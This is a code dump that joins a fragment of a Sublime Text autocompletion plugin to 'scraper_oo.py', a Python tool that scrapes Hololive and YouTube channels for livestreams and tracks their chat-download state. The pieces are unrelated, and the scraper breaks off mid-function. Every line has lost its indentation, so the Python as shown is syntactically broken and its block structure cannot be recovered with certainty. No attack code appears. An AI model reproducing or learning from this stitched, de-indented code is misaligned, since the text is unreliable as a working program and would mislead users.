def on_query_completions(self, view, prefix, locations):
context = get_context(view, prefix, locations)
if self.response_context == context:
# Have a finished response from before
return self.response
elif self.request_context == context:
# Currently being processed already...
return
# No active query or the context of the current query is not what we want.
# Start a new request.
self.request_context = context
settings = sublime.load_settings("completion.sublime-settings")
launch_daemon = settings.get("launch_daemon", False)
daemon_command = settings.get("daemon_command")
debug = settings.get("debug", False)
driver, args = prepare_request(view, prefix, locations, settings)
if driver == None or args == None:
return
t = threading.Thread(target=do_query, args=(context, self.got_response, driver, args, launch_daemon, daemon_command, debug))
t.start()
|
scraper_oo.py
|
#!/usr/bin/env python3
from bs4 import BeautifulSoup
import os
import subprocess
import sys
import json
import multiprocessing as mp
import datetime as dt
import time
import traceback
import signal
from chat_downloader import ChatDownloader
from chat_downloader.sites import YouTubeChatDownloader
from utils import extract_video_id_from_yturl
try:
from write_cgroup import write_cgroup
except ImportError:
def write_cgroup(mainpid):
pass
# Debug switch
DISABLE_PERSISTENCE = False
FORCE_RESCRAPE = False
SCRAPER_SLEEP_INTERVAL = 120 * 5 / 2
CHANNEL_SCRAPE_LIMIT = 30
downloadmetacmd = "../yt-dlp/yt-dlp.sh -s -q -j --ignore-no-formats-error "
downloadchatprgm = "../downloader.py"
channelscrapecmd = "../scrape_channel_oo.sh"
channelpostscrapecmd = "../scrape_community_tab.sh"
channelsfile = "./channels.txt"
watchdogprog = "../watchdog.sh"
holoscrapecmd = 'wget -nv --load-cookies=../cookies-schedule-hololive-tv.txt https://schedule.hololive.tv/lives -O auto-lives_tz'
# dict: video_id => Video
lives = {}
channels = {}
pids = {}
general_stats = {} # for debugging
statuses = {'unknown', 'prelive', 'live', 'postlive', 'upload'}
progress_statuses = {'unscraped', 'waiting', 'downloading', 'downloaded', 'missed', 'invalid', 'aborted'}
def get_timestamp_now():
return dt.datetime.utcnow().timestamp()
class TransitionException(Exception):
""" Invalid live status transition by setter """
pass
class Video:
""" Record the online status of a video, along with the scraper's download stage.
Metadata from Youtube is also stored when needed.
video_id is the unique Youtube ID for identifying a video.
"""
def __init__(self, video_id):
self.video_id = video_id
self.status = 'unknown'
self.progress = 'unscraped'
self.warned = False
self.init_timestamp = get_timestamp_now()
self.transition_timestamp = self.init_timestamp
self.meta_timestamp = None
# might delete one
self.meta = None
self.rawmeta = None
# might change
self.did_status_print = False
self.did_progress_print = False
self.did_discovery_print = False
self.did_meta_flush = False
def set_status(self, status: str):
""" Set the online status (live progress) of a video
Currently can be any of: 'unknown', 'prelive', 'live', 'postlive', 'upload'.
            Invalid status transitions print a warning (except for 'unknown').
"""
if status not in statuses:
raise ValueError(f"tried to set invalid status: {status}")
if status == 'unknown':
raise TransitionException("status cannot be set to 'unknown', only using reset")
if status == 'prelive' and self.status in {'live', 'postlive', 'upload'} \
or status == 'live' and self.status in {'postlive', 'upload'} \
or status == 'postlive' and self.status in {'upload'}:
print(f"warning: new video status invalid: transitioned from {self.status} to {status}", file=sys.stderr)
self.warned = True
if status == 'postlive' and self.status in {'prelive'}:
print(f"warning: new video status suspicious: transitioned from {self.status} to {status}", file=sys.stderr)
self.warned = True
if status == self.status:
print(f"warning: new video status suspicious: no change in status: {status}", file=sys.stderr)
self.warned = True
else:
self.did_status_print = False
self.did_meta_flush = False
self.transition_timestamp = get_timestamp_now()
self.status = status
def set_progress(self, progress: str):
""" Set the scraper progress of a video
Currently can be any of: 'unscraped', 'waiting', 'downloading', 'downloaded', 'missed', 'invalid', 'aborted'
            Invalid progress transitions throw a TransitionException.
"""
if progress not in progress_statuses:
raise ValueError(f"tried to set invalid progress status: {progress}")
if progress == 'unscraped':
raise TransitionException("progress cannot be set to 'unscraped', only using reset")
if progress == 'waiting' and self.progress != 'unscraped' \
or progress == 'downloading' and self.progress != 'waiting' \
or progress == 'downloaded' and self.progress != 'downloading' \
or progress == 'missed' and self.progress not in {'unscraped', 'waiting'} \
or progress == 'invalid' and self.progress != 'unscraped' \
or progress == 'aborted' and self.progress == 'downloaded':
raise TransitionException(f"progress cannot be set to {progress} from {self.progress}")
if progress == self.progress:
print(f"warning: new progress status suspicious: no change in progress: {progress}", file=sys.stderr)
self.warned = True
else:
self.did_progress_print = False
self.did_meta_flush = False
self.transition_timestamp = get_timestamp_now()
self.progress = progress
def reset_status(self):
""" Set the status to 'unknown'. Useful for clearing state loaded from disk. """
self.status = 'unknown'
def reset_progress(self):
""" Set progress to 'unscraped'. Useful for clearing state loaded from disk. """
self.progress = 'unscraped'
def prepare_meta(self):
""" Load meta from disk or fetch it from YouTube. """
# NOTE: Currently unused.
if self.meta is None:
rescrape(self)
self.rawmeta = self.meta.get('raw')
if self.rawmeta:
del self.meta['raw']
self.meta_timestamp = get_timestamp_now()
def rescrape_meta(self):
""" Ignore known meta and fetch meta from YouTube. """
lastmeta = self.meta
self.meta = None
try:
rescrape(self)
except Exception:
self.meta = lastmeta
if self.meta:
rawmeta = self.meta.get('raw')
if rawmeta:
self.rawmeta = rawmeta
del self.meta['raw']
# Avoid a case where failing meta scrapes kept flushing.
is_simple = self.meta is not None and self.rawmeta is None
if not is_simple or self.meta != lastmeta:
self.meta_timestamp = get_timestamp_now()
self.did_meta_flush = False
class Channel:
""" Tracks basic details about a channel, such as the videos that belong to it. """
def __init__(self, channel_id):
self.channel_id = channel_id
self.videos = set()
self.init_timestamp = get_timestamp_now()
self.modify_timestamp = self.init_timestamp
self.did_discovery_print = False
self.batching = False
self.batch = None
def add_video(self, video: Video):
""" Add a video to our list, and possibly our current batch
Modifies timestamp on success
"""
if video.video_id not in self.videos:
self.videos.add(video.video_id)
self.modify_timestamp = get_timestamp_now()
self.did_discovery_print = False
if self.batching:
self.batch.add(video.video_id)
def add_video_ids(self, video_ids: list):
""" Add videos to our list, and possibly our current batch
Modifies timestamp on success
"""
        new_videos = set(video_ids) - self.videos
        if len(new_videos) > 0:
            self.videos |= new_videos
            self.modify_timestamp = get_timestamp_now()
            self.did_discovery_print = False
            if self.batching:
                self.batch |= new_videos
def start_batch(self):
""" Declare that the next videos are a new batch """
if self.batching:
raise TransitionException("channel batch already started")
self.batching = True
self.batch = set()
def end_batch(self):
""" Finish declaring that the next videos are a new batch """
if not self.batching:
raise TransitionException("channel batch not started")
self.batching = False
def clear_batch(self):
""" Forget a batch (does not affect list of videos) """
self.batching = False
self.batch = set()
# video statuses:
# unknown: not yet scraped
# prelive: scheduled live
# live: in-progress live
# postlive: completed/missed live
# upload: not a livestream
# progress statuses:
# add -> unscraped
# unscraped -> waiting if scheduled
# unscraped -> downloading if downloader invoked (I don't think this is used)
# unscraped -> missed if was live
# unscraped -> invalid if not a live (was uploaded)
# waiting -> downloading when the chat is available, downloader invoked
# waiting -> missed if downloader was unable to invoke and finished airing
# downloading -> downloaded if downloader completes.
# unscraped: needs scrape
# waiting: future-scheduled live, not yet downloading or downloaded
# downloading: chat downloader invoked successfully
# downloaded: chat downloader completed after successful invocation
# missed: already aired live, we skip
# invalid: isn't a livestream
# aborted: could not process video (scrape failed?)
# YTMeta:
# raw: json output of the yt-dl program
# id:
# title:
# description:
# duration:
# uploader: (name)
# channel_id:
# is_livestream:
# is_live:
# live_starttime:
# live_endtime:
# is_upcoming:
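# A minimal lifecycle sketch of the states described above, using the Video class defined earlier
# (illustrative only; real transitions are driven by the scrape/download code below):
#   v = Video('xxxxxxxxxxx')                                  # status='unknown', progress='unscraped'
#   v.set_status('prelive');  v.set_progress('waiting')       # scheduled live discovered
#   v.set_status('live');     v.set_progress('downloading')   # chat downloader invoked
#   v.set_status('postlive'); v.set_progress('downloaded')    # stream ended, download completed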
def update_lives():
subprocess.run(holoscrapecmd, shell=True)
html_doc = ''
with open("auto-lives_tz", "rb") as fp:
html_doc = fp.read()
soup = BeautifulSoup(html_doc, 'html.parser')
with open("auto-lives_tz", "wb") as fp:
fp.write(soup.prettify().encode())
return soup
def update_lives_status():
with open("discovery.txt", "a") as dlog:
try:
update_lives_status_holoschedule(dlog)
except Exception:
print("warning: exception during holoschedule scrape. Network error?")
traceback.print_exc()
try:
update_lives_status_urllist(dlog)
except Exception:
print("warning: exception during urllist scrape. Network error?")
traceback.print_exc()
try:
update_lives_status_channellist(dlog)
except Exception:
print("warning: exception during channellist scrape. Network error?")
traceback.print_exc()
def update_lives_status_holoschedule(dlog):
# Find all sections indicated by a 'day' header
soup = update_lives()
allcont = soup.find(id='all')
allcontchildren = [node for node in allcont.children if len(repr(node)) > 4]
localdate = ''
newlives = 0
knownlives = 0
error = False
try:
for child in allcontchildren:
day = child.find(class_='navbar-text')
if day:
localdate = [x for x in day.stripped_strings][0].split()[0]
# Extract MM/DD date from header
for link in child.find_all('a'):
# Process Youtube link; get HH:MM starttime and user-friendly channel name (not localized) if possible
items = None
localtime = ''
channelowner = ''
video_id = None
malformed = False
# Extract link
href = link.get('href')
video_id = extract_video_id_from_yturl(href)
if video_id is None:
error = True
continue
# Check for existing state
if video_id not in lives:
recall_video(video_id, filter_progress=True)
video = lives[video_id]
if video_id not in lives:
video = Video(video_id)
lives[video_id] = video
try:
items = [x for x in link.stripped_strings]
localtime = items[0]
channelowner = items[1]
except Exception:
malformed = True
if not malformed:
print("discovery: new live listed: " + video_id + " " + localdate + " " + localtime + " : " + channelowner, file=dlog, flush=True)
else:
print("discovery: new live listed (malformed page): " + video_id, file=dlog, flush=True)
newlives += 1
else:
# known (not new) live listed
knownlives += 1
except Exception:
error = True
traceback.print_exc()
if newlives + knownlives == 0 or error:
print("warning: unexpected error when processing holoschedule page (found " + str(newlives + knownlives) + " total lives), using fallback", file=sys.stderr)
saved_newlives = newlives
newlives = 0
knownlives = 0
error = False
for link in soup.find_all('a'):
# Extract any link
href = link.get('href')
video_id = None
video_id = extract_video_id_from_yturl(href)
if video_id is None:
error = True
continue
if not malformed:
if video_id not in lives:
recall_video(video_id, filter_progress=True)
video = lives[video_id]
if video_id not in lives:
video = Video(video_id)
lives[video_id] = video
print("discovery: new live listed (fallback extraction): " + video_id, file=dlog, flush=True)
newlives += 1
else:
# known (not new) live listed
knownlives += 1
print("discovery: holoschedule: (fallback) new lives: " + str(newlives))
print("discovery: holoschedule: (fallback) new lives (initial try): " + str(saved_newlives))
print("discovery: holoschedule: (fallback) known lives: " + str(knownlives))
if error:
print("note: video id extraction errors occured when processing holoschedule page using fallback method (found " + str(newlives + knownlives) + " total lives)", file=sys.stderr)
else:
print("discovery: holoschedule: new lives: " + str(newlives))
print("discovery: holoschedule: known lives: " + str(knownlives))
def update_lives_status_urllist(dlog):
# TODO
pass
def update_lives_status_channellist(dlog):
""" Read channels.txt for a list of channel IDs to process. """
try:
if os.path.exists(channelsfile):
with open(channelsfile) as channellist:
for channel_id in [x.strip().split()[0] for x in channellist.readlines()]:
channel = None
use_ytdlp = False
if channel_id in channels:
channel = channels[channel_id]
else:
channel = Channel(channel_id)
channels[channel_id] = channel
# use chat_downloader to get initial video list
print("New channel: " + channel.channel_id)
if not use_ytdlp:
try:
scrape_and_process_channel_chatdownloader(channel, dlog)
except Exception:
print("failed to scrape channel list with chat_downloader:", channel_id, file=sys.stderr)
traceback.print_exc()
use_ytdlp = True
if use_ytdlp:
invoke_channel_scraper(channel)
process_channel_videos(channel, dlog)
# Scrape community tab page for links (esp. member stream links)
# Currently only try this when cookies are provided.
if os.path.exists(channel_id + ".txt"):
invoke_channel_scraper(channel, community_scrape=True)
process_channel_videos(channel, dlog)
except Exception:
print("warning: unexpected error with processing channels.txt", file=sys.stderr)
traceback.print_exc()
def rescrape_chatdownloader(video: Video, channel=None, youtube=None):
""" rescrape_ytdlp, but using chat_downloader """
video_id = video.video_id
video_data, player_response, status = invoke_scraper_chatdownloader(video_id, youtube)
microformat = player_response['microformat']['playerMicroformatRenderer']
video_details = player_response['videoDetails']
# keep only known useful fields, junk spam/useless fields
old_player_response = player_response
player_response = {}
for key in ['playabilityStatus', 'videoDetails', 'microformat']:
player_response[key] = old_player_response[key]
for key in ['streamingData']:
player_response[key] = old_player_response.get(key)
del old_player_response
# "export" the fields manually here
meta = {}
meta['_scrape_provider'] = 'chat_downloader'
meta['id'] = video_id
meta['referrer_channel_id'] = channel and channel.channel_id
meta['channel_id'] = video_details['channelId']
meta['title'] = microformat['title']['simpleText']
meta['raw'] = player_response # I think this is different from yt-dlp infodict output
meta['description'] = microformat['description']['simpleText']
meta['uploader'] = video_data['author']
meta['duration'] = video_data['duration']
meta['is_live'] = video_details.get('isLive') is True
meta['is_upcoming'] = video_details.get('isUpcoming') is True
meta['is_livestream'] = video_details.get('isLiveContent') is True
try:
meta['live_starttime'] = int(dt.datetime.fromisoformat(microformat['liveBroadcastDetails']['startTimestamp']).timestamp() + 0.1)
except Exception:
meta['live_starttime'] = None
try:
meta['live_endtime'] = int(dt.datetime.fromisoformat(microformat['liveBroadcastDetails']['endTimestamp']).timestamp() + 0.1)
except Exception:
meta['live_endtime'] = None
if meta['is_live']:
meta['live_status'] = 'is_live'
elif meta['is_upcoming']:
meta['live_status'] = 'is_upcoming'
elif meta['is_livestream']:
meta['live_status'] = 'was_live'
else:
meta['live_status'] = 'not_live'
video.set_status(status)
video.reset_progress()
video.meta = meta
rawmeta = meta.get('raw')
if not rawmeta:
# Note: rawmeta may be older than meta, but it's better than being lost.
video.set_progress('aborted')
else:
video.rawmeta = rawmeta
video.set_progress('waiting')
video.meta_timestamp = get_timestamp_now()
try:
del meta['raw']
except KeyError:
pass
def invoke_scraper_chatdownloader(video_id, youtube=None, skip_status=False):
""" Like invoke_scraper_ytdlp, but use chat_downloader's python interface instead of forking and calling yt-dlp.
Try to export the status for the autoscraper as well.
Returns raw YouTube data and the deduced status.
"""
if youtube is None:
downloader = ChatDownloader()
youtube = downloader.create_session(YouTubeChatDownloader)
video_data, player_response, *_ = youtube._parse_video_data(video_id)
scraper_status = None
if not skip_status:
details = youtube.get_video_data(video_id)
status = details.get('status')
video_type = details.get('video_type')
if video_type not in {'premiere', 'video'} or (video_type == 'premiere' and details.get('continuation_info') == {}):
scraper_status = 'upload'
elif status == 'upcoming':
scraper_status = 'prelive'
elif status == 'live':
scraper_status = 'live'
elif status == 'past':
scraper_status = 'postlive'
else:
scraper_status = 'unknown'
return video_data, player_response, scraper_status
def scrape_and_process_channel_chatdownloader(channel: Channel, dlog):
""" Use chat_downloader's get_user_videos() to quickly get channel videos and live statuses. """
downloader = ChatDownloader()
# Forcefully create a YouTube session
youtube = downloader.create_session(YouTubeChatDownloader)
limit = CHANNEL_SCRAPE_LIMIT
count = 0
perpage_count = 0
valid_count = 0
skipped = 0
seen_vids = set()
# We don't just check 'all' since the list used may be slow to update.
for video_status in ['upcoming', 'live', 'all']:
perpage_count = 0
time.sleep(0.1)
for basic_video_details in youtube.get_user_videos(channel_id=channel.channel_id, video_status=video_status):
status = 'unknown'
status_hint = None
video_id = basic_video_details.get('video_id')
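            # The 'view_count' field is assumed to be a human-readable string such as
            # "1,234 waiting" (scheduled), "1,234 watching" (live) or "1,234 views" (VOD/upload);
            # its second word is used below as the status hint.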
try:
status_hint = basic_video_details['view_count'].split()[1]
if status_hint == "waiting":
status = 'prelive'
elif status_hint == "watching":
status = 'live'
elif status_hint == "views":
pass
else:
print(f"warning: could not understand status hint ({status_hint = })", file=sys.stderr)
raise RuntimeError('could not extract status hint')
except KeyError:
if video_id is not None and lives[video_id].progress not in {'unscraped', 'aborted'} and lives[video_id].status not in {'postlive', 'upload'}:
print(f"warning: status hint extraction: unexpected KeyError... {count = } {perpage_count = } (+1) ... {valid_count = } {skipped = } {limit = } ... {seen_vids = } ... {basic_video_details = })", file=sys.stderr)
traceback.print_exc()
else:
# 'waiting' may be hidden on the player response page (possibly a server bug, but could also be intentional)
print(f"warning: status hint extraction: unexpected KeyError, already scraped, not live... {basic_video_details = })", file=sys.stderr)
except Exception:
print("warning: could not extract status hint", file=sys.stderr)
raise
perpage_count += 1
if perpage_count >= limit:
if video_id in seen_vids or status == 'unknown' or (video_id in lives and lives[video_id].progress != 'unscraped'):
# would continue
print(f"perpage limit of {limit} reached:", video_status)
if video_id not in seen_vids:
count += 1
if status != 'unknown' and not (video_id in lives and lives[video_id].progress != 'unscraped'):
skipped += 1
break
if video_id in seen_vids:
continue
else:
count += 1
if status == 'unknown':
# ignore past streams/uploads
continue
valid_count += 1
if video_id in lives and lives[video_id].progress != 'unscraped':
skipped += 1
continue
if status != 'unknown':
print(f"discovery: new live listed (chat_downloader channel extraction, status: {status}): " + video_id, file=sys.stdout, flush=True)
print(f"discovery: new live listed (chat_downloader channel extraction, status: {status}): " + video_id, file=dlog, flush=True)
if video_id not in lives:
lives[video_id] = Video(video_id)
video = lives[video_id]
channel.add_video(video)
rescrape_chatdownloader(video, channel=channel, youtube=youtube)
persist_meta(video, fresh=True)
if perpage_count >= limit:
print(f"perpage limit of {limit} reached:", video_status)
break
if count >= limit * 3:
print(f"limit of {limit} reached")
break
print(f"discovery: channels list (via chat_downloader): channel {channel.channel_id} new upcoming/live lives: " + str(valid_count) + "/" + str(count) + " (" + str(skipped) + " known)")
def invoke_channel_scraper(channel: Channel, community_scrape=False):
""" Scrape the channel for latest videos and batch-fetch meta state. """
# Note: some arbitrary limits are set in the helper program that may need tweaking.
if not community_scrape:
print("Scraping channel " + channel.channel_id)
subprocess.run(channelscrapecmd + " " + channel.channel_id, shell=True)
else:
print("Scraping channel community pages " + channel.channel_id)
subprocess.run(channelpostscrapecmd + " " + channel.channel_id, shell=True)
with open("channel-cached/" + channel.channel_id + ".meta.new") as allmeta:
metalist = []
for jsonres in allmeta.readlines():
try:
metalist.append(export_scraped_fields_ytdlp(json.loads(jsonres)))
except Exception:
if community_scrape:
print("warning: exception in channel post scrape task (corrupt meta?)", file=sys.stderr)
else:
print("warning: exception in channel scrape task (corrupt meta?)", file=sys.stderr)
traceback.print_exc()
for ytmeta in metalist:
video_id = ytmeta["id"]
recall_video(video_id, filter_progress=True)
video = lives.get(video_id)
if video and video.meta is None:
video.meta = ytmeta
video.rawmeta = ytmeta.get('raw')
video.did_meta_flush = False
else:
if community_scrape:
print("ignoring ytmeta from channel post scrape")
else:
print("ignoring ytmeta from channel scrape")
# TODO: rewrite
def process_channel_videos(channel: Channel, dlog):
""" Read scraped channel video list, proccess each video ID, and persist the meta state. """
newlives = 0
knownlives = 0
numignores = {}
channel_id = channel.channel_id
channel.did_discovery_print = True
channel.start_batch()
try:
with open("channel-cached/" + channel_id + ".url.all") as urls:
for video_id in [f.split(" ")[1].strip() for f in urls.readlines()]:
# Process each recent video
if video_id not in lives:
recall_video(video_id, filter_progress=True)
video = lives[video_id]
channel.add_video(video)
if not channel.did_discovery_print:
print("discovery: new live listed: " + video_id + " on channel " + channel_id, file=dlog, flush=True)
# TODO: accumulate multiple videos at once.
channel.did_discovery_print = True
newlives += 1
else:
# known (not new) live listed (channel unaware)
knownlives += 1
saved_progress = video.progress
if not FORCE_RESCRAPE and saved_progress in {'downloaded', 'missed', 'invalid', 'aborted'}:
numignores[saved_progress] = numignores.setdefault(saved_progress, 0) + 1
delete_ytmeta_raw(video_id, suffix=" (channel)")
continue
cache_miss = False
# process precached meta
if video.meta is None:
# We may be reloading old URLs after a program restart
print("ytmeta cache miss for video " + video_id + " on channel " + channel_id)
cache_miss = True
rescrape(video)
if video.meta is None:
# scrape failed
continue
video.rawmeta = video.meta.get('raw')
video.did_meta_flush = False
process_ytmeta(video)
# Avoid redundant disk flushes (as long as we presume that the title/description/listing status won't change)
# I look at this and am confused by the '==' here (and one place elsewhere)...
if cache_miss or (saved_progress not in {'missed', 'invalid'} and saved_progress != video.progress):
persist_meta(video, fresh=True)
if not video.did_meta_flush:
# Essentially nerfs the above performance optimization...
print("warning: didn't flush meta for channel video; flushing now", file=sys.stderr)
persist_meta(video, fresh=True)
except IOError:
print("warning: unexpected I/O error when processing channel scrape results", file=sys.stderr)
traceback.print_exc()
channel.end_batch()
if len(channel.batch) > 0:
print("discovery: channels list: new lives on channel " + channel_id + " : " + str(newlives))
print("discovery: channels list: known lives on channel " + channel_id + " : " + str(knownlives))
for progress, count in numignores.items():
print("discovery: channels list: skipped ytmeta fetches on channel " + channel_id + " : " + str(count) + " skipped due to progress state '" + progress + "'")
channel.clear_batch()
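# On-disk layout used by persist_meta() / recall_video() below:
#   by-video-id/<video_id>                         - json with the 'status' and 'progress' fields
#   by-video-id/<video_id>.meta                    - json holding the 'ytmeta' dict (plus 'raw' when kept)
#   by-video-id/<video_id>.meta.<status>[.simple]  - per-status snapshot of the same ytmeta
#   pid/<video_id>                                 - downloader PID while a download is being tracked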
def persist_meta(video: Video, fresh=False, clobber=True):
video_id = video.video_id
metafile = 'by-video-id/' + video_id
# Debug switch
if DISABLE_PERSISTENCE:
print('NOT updating ' + metafile)
return
if clobber or not os.path.exists(metafile):
print('Updating ' + metafile)
pidfile = 'pid/' + video_id
meta = {}
meta['status'] = video.status
# TODO: only process_dlpid_queue uses fresh=False, so the "saved" progress is mostly useless.
# Best just special-case that setter function, if even needed.
meta['progress'] = video.progress
# Write ytmeta to a separate file (to avoid slurping large amounts of data)
if video.meta is not None:
ytmeta = {}
ytmeta['ytmeta'] = video.meta
ytmeta['ytmeta']['raw'] = video.rawmeta
if video.rawmeta is None:
ytmeta['ytmeta']['raw'] = video.meta.get('raw')
metafileyt = metafile + ".meta"
metafileyt_status = metafileyt + "." + video.status
if video.rawmeta is None:
metafileyt_status += ".simple"
try:
if clobber or not os.path.exists(metafileyt):
print('Updating ' + metafileyt)
with open(metafileyt, 'wb') as fp:
fp.write(json.dumps(ytmeta, indent=1).encode())
if clobber or not os.path.exists(metafileyt_status):
print('Updating ' + metafileyt_status)
with open(metafileyt_status, 'wb') as fp:
fp.write(json.dumps(ytmeta, indent=1).encode())
finally:
try:
# Since we don't deep-copy, don't keep 'raw' in the meta dict.
if video.rawmeta is not None:
del video.meta['raw']
except KeyError:
pass
if clobber or not os.path.exists(metafile):
with open(metafile, 'wb') as fp:
fp.write(json.dumps(meta, indent=1).encode())
if clobber or not os.path.exists(pidfile):
with open(pidfile, 'wb') as fp:
if pids.get(video_id) is not None:
# Write dlpid to file
fp.write(str(pids[video_id][1]).encode())
video.did_meta_flush = True
# TODO: replace recall_meta with recall_video
def recall_video(video_id: str, filter_progress=False):
""" Read status, progress for video_id.
If filter_progress is set to True, avoid ytmeta loads for certain progress states,
unless unconditional rescraping is set.
"""
# Not cached in memory, look for saved state.
metafile = 'by-video-id/' + video_id
metafileyt = metafile + ".meta"
valid_meta = os.path.exists(metafile)
valid_ytmeta = os.path.exists(metafileyt)
meta = None
ytmeta = None
should_ignore = False
if valid_meta:
# Query saved state if it is not loaded
with open(metafile, 'rb') as fp:
try:
meta = json.loads(fp.read())
valid_meta = meta['status'] in statuses and meta['progress'] in progress_statuses
except (json.decoder.JSONDecodeError, KeyError):
valid_meta = False
# Reduce memory usage by not loading ytmeta for undownloadable videos
if filter_progress:
should_ignore = meta['progress'] in {'downloaded', 'missed', 'invalid', 'aborted'}
# note: FORCE_RESCRAPE might clobber old ytmeta if not loaded (bad if the video drastically changes or goes unavailable)
if valid_ytmeta and not should_ignore:
with open(metafileyt, 'rb') as fp:
try:
ytmeta = json.loads(fp.read())
valid_ytmeta = 'ytmeta' in ytmeta
except (json.decoder.JSONDecodeError, KeyError):
valid_ytmeta = False
video = Video(video_id)
lives[video_id] = video
if valid_meta:
# Commit status to runtime tracking (else we would discard it here)
# Direct assignment here to avoid checks, might rewrite later
video.status = meta['status']
video.progress = meta['progress']
if valid_ytmeta and not should_ignore:
video.meta = ytmeta['ytmeta']
video.rawmeta = ytmeta['ytmeta'].get('raw')
if video.rawmeta is not None:
del video.meta['raw']
# unmigrated (monolithic file) format
elif 'ytmeta' in meta:
video.meta = meta['ytmeta']
video.rawmeta = meta['ytmeta'].get('raw')
if video.rawmeta is not None:
del video.meta['raw']
if DISABLE_PERSISTENCE:
return
print('notice: migrating ytmeta in status file to new file right now: ' + metafile)
persist_meta(video, fresh=True)
if should_ignore:
delete_ytmeta_raw(video, suffix=" (meta recall)")
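# process_ytmeta() below maps the scraped fields onto the status/progress state machine:
#   is_upcoming                -> status 'prelive',  progress 'waiting' (if still unscraped)
#   is_live                    -> status 'live',     progress 'waiting' (if still unscraped)
#   is_livestream/live_endtime -> status 'postlive', progress 'missed'  (if still unscraped)
#   anything else              -> status 'upload',   progress 'invalid'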
def process_ytmeta(video: Video):
if video.meta is None:
raise RuntimeError('precondition failed: called process_ytmeta but ytmeta for video ' + video.video_id + ' not found.')
if video.meta['is_upcoming']:
# note: premieres can also be upcoming but are not livestreams.
video.set_status('prelive')
if video.progress == 'unscraped':
video.set_progress('waiting')
elif video.meta['is_live']:
video.set_status('live')
if video.progress == 'unscraped':
video.set_progress('waiting')
elif video.meta['is_livestream'] or video.meta['live_endtime']:
# note: premieres also have a starttime and endtime
video.set_status('postlive')
if video.progress == 'unscraped':
video.set_progress('missed')
else:
video.set_status('upload')
video.set_progress('invalid')
def maybe_rescrape(video: Video):
saved_progress = video.progress
if video.progress == 'unscraped':
video.rescrape_meta()
if video.meta is None:
# scrape failed
return
process_ytmeta(video)
# Avoid redundant disk flushes (as long as we presume that the title/description/listing status won't change)
if saved_progress not in {'missed', 'invalid'} and saved_progress != video.progress:
persist_meta(video, fresh=True)
def maybe_rescrape_initially(video: Video):
if video.progress == 'downloading':
video.reset_progress()
if video.progress == 'unscraped' or FORCE_RESCRAPE:
video.rescrape_meta()
if video.meta is None:
# scrape failed
return
process_ytmeta(video)
# Redundant, but purges corruption
persist_meta(video, fresh=True)
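# export_scraped_fields_ytdlp() below normalizes scraper output: it prefers the custom fields
# provided by the forked yt-dlp (is_live/live_starttime/live_endtime/is_upcoming) and falls back
# to upstream yt-dlp's 'live_status'/'release_timestamp' fields, approximating live_endtime as
# live_starttime + duration when both are available.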
def export_scraped_fields_ytdlp(jsonres):
ytmeta = {}
ytmeta['_scrape_provider'] = 'yt-dlp'
ytmeta['raw'] = jsonres
ytmeta['id'] = jsonres['id']
ytmeta['title'] = jsonres['title']
ytmeta['description'] = jsonres['description']
ytmeta['uploader'] = jsonres['uploader']
ytmeta['channel_id'] = jsonres['channel_id']
ytmeta['duration'] = jsonres['duration']
try:
# Fields from my yt-dlp fork's experimental patches
ytmeta['is_live'] = jsonres['is_live']
ytmeta['live_starttime'] = jsonres['live_starttime']
ytmeta['live_endtime'] = jsonres['live_endtime']
ytmeta['is_upcoming'] = jsonres['is_upcoming']
ytmeta['is_livestream'] = jsonres['was_live']
except KeyError:
# yt-dlp introduced their own new metadata fields for livestreams, try those.
# Note that some data, like the endtime, can't be directly obtained. Also,
# ISO-8601 times for starttime/endtime have been converted to epoch timestamps.
try:
# Old field but repurposed to strictly match its name.
ytmeta['is_livestream'] = jsonres['was_live']
# Refetch using possibly missing new fields
ytmeta['is_livestream'] = 'not_live' not in jsonres['live_status']
if 'track' in jsonres:
# Should be a song, so likely (certainly?) a premiere
ytmeta['is_livestream'] = False
# Reliable, except in the case of "late" livestreams (where it seems to be missing).
ytmeta['live_starttime'] = jsonres['release_timestamp']
# The duration provided by Youtube might not be the broadcast duration;
# further testing is required. We don't rely on the duration though
# except for saving finished stream metadata, which isn't done automatically.
if ytmeta['live_starttime'] is not None and bool(ytmeta['duration']):
ytmeta['live_endtime'] = ytmeta['live_starttime'] + ytmeta['duration']
else:
ytmeta['live_endtime'] = None
# Fields is_upcoming and is_live have been merged into a string field.
ytmeta['live_status'] = jsonres['live_status']
if ytmeta['live_status'] == 'is_live':
ytmeta['is_live'] = True
elif ytmeta['live_status'] in {'is_upcoming', 'was_live', 'not_live'}:
ytmeta['is_live'] = False
else:
# live_status is None or set to an unknown value
ytmeta['is_live'] = ytmeta['live_status'] != 'is_upcoming' and jsonres['live_endtime'] is None
if 'is_upcoming' not in ytmeta:
ytmeta['is_upcoming'] = ytmeta['live_status'] == 'is_upcoming'
except (TypeError, KeyError):
print("warning: exporting ytmeta fields not fully successful, expect this download to fail:", ytmeta.get('id'), file=sys.stderr)
ytmeta['is_livestream'] = ytmeta.get('is_livestream')
ytmeta['live_starttime'] = ytmeta.get('live_starttime')
ytmeta['live_endtime'] = ytmeta.get('live_endtime')
ytmeta['live_status'] = ytmeta.get('live_status')
ytmeta['is_live'] = ytmeta.get('is_live')
# last-ditch effort to avoid missing a stream
ytmeta['is_upcoming'] = ytmeta.get('is_upcoming') or not bool(ytmeta['duration'])
return ytmeta
def rescrape_ytdlp(video: Video):
""" Invoke the scraper, yt-dlp, on a video now.
Sets a restructured json result as meta.
"""
jsonres = invoke_scraper_ytdlp(video.video_id)
if jsonres is None:
# Mark as aborted here, before processing
video.set_progress('aborted')
return None
video.meta = export_scraped_fields_ytdlp(jsonres)
def invoke_scraper_ytdlp(video_id):
if video_id not in lives:
raise ValueError('invalid video_id')
proc = None
try:
cmdline = downloadmetacmd + "-- " + video_id
print(cmdline.split())
proc = subprocess.run(cmdline.split(), capture_output=True)
with open('outtmp', 'wb') as fp:
fp.write(proc.stdout)
if len(proc.stdout) == 0:
print(b"scraper error: no stdout! stderr=" + proc.stderr)
return None
return json.loads(proc.stdout)
except Exception:
print("warning: exception thrown during scrape task. printing traceback...", file=sys.stderr)
traceback.print_exc()
if proc:
print("stdout dump for failed scrape, for video " + video_id + ":", file=sys.stderr)
print(proc.stdout, file=sys.stderr)
print("end of stdout dump for failed scrape:", file=sys.stderr)
return None
def safen_path(s):
try:
# The slice is to avoid long fields hitting path limits, albeit ineffectively.
return str(s).replace(':', '_').replace('/', '_').replace(' ', '_')[0:100]
except Exception:
print("warning: string safening failed, returning dummy value...")
return ""
q = mp.SimpleQueue()
def process_dlpid_queue():
""" Process (empty) the queue of PIDs from newly invoked downloaders and update their state. """
while not q.empty():
(pid, dlpid, vid) = q.get()
try:
lives[vid].set_progress('downloading')
